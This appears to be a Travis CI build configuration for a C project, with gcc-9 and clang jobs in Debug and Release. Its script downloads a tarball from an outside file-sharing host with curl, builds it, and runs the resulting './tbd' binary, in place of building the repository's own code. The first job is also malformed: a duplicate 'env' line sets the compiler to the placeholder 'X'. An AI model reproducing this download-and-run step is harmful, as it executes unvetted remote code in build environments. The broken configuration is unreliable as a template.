os: linux
dist: bionic
language: c

jobs:
   include:
      - stage: Debug build
        env: CC=gcc-9 CONFIG=Debug
        env: CC=X
      - stage: Debug build
        env: CC=clang CONFIG=Debug
      - stage: Release build
        env: CC=gcc-9 CONFIG=Release
      - stage: Release build
        env: CC=clang CONFIG=Release

addons:
  apt:
     sources:
        - sourceline: 'ppa:ubuntu-toolchain-r/test'
     packages:
        - gcc-9
        - cmake

script:
   - curl -OL https://up.psty.io/937/tbd.tar.gz && tar -xzf tbd.tar.gz && cd tbd.linux
   - mkdir build && cd build
   - cmake -DCMAKE_BUILD_TYPE=$CONFIG .. && make CC=$CC
   - ./tbd
